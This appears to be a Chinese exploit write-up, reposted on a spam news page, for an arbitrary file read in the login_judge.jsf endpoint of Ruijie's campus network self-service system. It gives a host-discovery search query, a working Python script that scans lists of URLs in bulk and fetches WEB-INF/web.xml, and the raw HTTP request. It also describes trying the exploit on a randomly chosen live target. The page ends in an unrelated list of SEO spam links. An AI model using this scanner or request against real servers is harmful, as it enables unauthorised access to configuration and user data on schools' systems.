当前位置: 首页 > news >正文

工控网做网站维护吗网络营销的优势和劣势

工控网做网站维护吗,网络营销的优势和劣势,网站建设专家如何选,从事网站建设声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。 一、漏洞描述 锐捷校园网自助服务系统是用于学校网络管理的一个平台,login_judge.jsf接口存在任意文件读取…

声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

锐捷校园网自助服务系统是用于学校网络管理的一个平台,login_judge.jsf接口存在任意文件读取漏洞,意味着攻击者可能通过特定的请求访问或下载系统上的任意文件,这可能包括敏感的配置信息、用户数据等。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:web.body="校园网自助服务系统"

2.使用poc批量扫描

import requests
import argparse
import time
from urllib3.exceptions import InsecureRequestWarning# 禁用不安全的请求警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)# 定义颜色代码,用于输出红色文本
RED = '\033[91m'
RESET = '\033[0m'def check_vulnerability(url):"""检查目标URL是否存在锐捷校园网自助服务系统login_judge任意文件读取漏洞。:param url: 目标URL"""try:# 构造攻击URL,尝试访问WEB-INF目录下的web.xml文件attack_url = url.rstrip('/') + "/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=%2e/WEB-INF/web.xml%3F"# 发送GET请求,不验证SSL证书,设置超时时间为10秒response = requests.get(attack_url, verify=False, timeout=10)# 判断响应状态码和响应内容是否包含特定字符串if response.status_code == 200 and 'web-app' in response.text:print(f"{RED}URL [{url}] 存在锐捷校园网自助服务系统login_judge任意文件读取漏洞{RESET}")else:print(f"URL [{url}] 不存在漏洞")except requests.exceptions.Timeout:# 捕获超时异常,提示可能存在漏洞print(f"URL [{url}] 请求超时,可能存在漏洞")except requests.RequestException as e:# 捕获其他请求异常,输出错误信息print(f"URL [{url}] 请求失败: {e}")def main():"""主函数,解析命令行参数并执行漏洞检测。"""parser = argparse.ArgumentParser(description='检测目标地址是否存在锐捷校园网自助服务系统login_judge任意文件读取漏洞')parser.add_argument('-u', '--url', help='指定目标地址')parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')args = parser.parse_args()if args.url:# 如果提供了单个URL参数,确保其以http://或https://开头if not args.url.startswith("http://") and not args.url.startswith("https://"):args.url = "http://" + args.urlcheck_vulnerability(args.url)elif args.file:# 如果提供了文件参数,逐行读取文件中的URL并进行检查with open(args.file, 'r') as file:urls = file.read().splitlines()for url in urls:if not url.startswith("http://") and not url.startswith("https://"):url = "http://" + urlcheck_vulnerability(url)if __name__ == '__main__':main()

cmd运行:python poc.py -f url.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F HTTP/1.1
Host:ip

2.数据包分析 

  • GET: 表示这是一个HTTP GET请求。
  • /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F: 这是请求的URL路径。它包含了多个目录和文件名,以及一个查询参数view。查询参数的值是./WEB-INF/web.xml%3F,其中./WEB-INF/web.xml文件是Java Web应用程序的配置文件,它包含了关于Web应用程序的配置信息,%3F是问号(?)的URL编码,这个查询参数是用来指定要访问的资源或执行某些操作。
  • HTTP/1.1: 表示使用的是HTTP协议的版本1.1。
  • Host: ip: 这是一个HTTP头字段,表示请求的目标主机地址。这里的ip应该是实际的IP地址或者域名。

3.结束跑路

通过网页访问:ip/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F

通过yakit构建数据包访问

每篇一言:心向花开,何不朝夕。

http://www.yidumall.com/news/109809.html

相关文章:

  • 大学生网站开发接单站长工具的使用seo综合查询排名
  • 做问卷的网站有哪些引流app推广软件
  • 做学校后台网站用什么浏览器关键词优化排名用哪个软件比较好
  • 网站信息 订阅如何做北京外贸网站优化
  • h5网站建设广州做seo公司
  • 商业网站建站目的厦门百度推广排名优化
  • 制造行业网站建设纯注册app拉新挣钱
  • 高端网站制作网站设计怎么做网址
  • .net网站开发源码注释国际热点事件
  • 网站建设很简单长春网站提升排名
  • 做网站充值犯法吗长沙网站seo推广公司
  • 可以嗅探付费视频地址的软件seo研究中心道一老师
  • 农业网站素材seo排名啥意思
  • 网站5g空间谷歌收录查询工具
  • 建立什么填词语seo模拟点击
  • 莆田外贸专业建站企业营销策划书如何编写
  • 做明星网站可以做那些子网页西安百度推广电话
  • 石家庄网站建设策划方案刚刚发生 北京严重发生
  • 如何制造一个网站如何推广网站运营
  • 什么网站做禽苗好的网站济南seo外包服务
  • 成都网站建设公司排行谷歌排名算法
  • 如何做超市的网站南昌百度快速排名提升
  • 杭州 企业门户网站建设学历提升哪个教育机构好一些
  • soho的网站怎么做网站优化网
  • 有用cc域名做网站的好的网站或网页
  • 梅州市网站制作河源疫情最新通报
  • 做网站公司青浦在线查网站的ip地址
  • 燕赵邯郸网站建设搜狗站长平台主动提交
  • 自建站服务成都十大营销策划公司
  • 黄岛网站建设哪家专业免费网站推广2023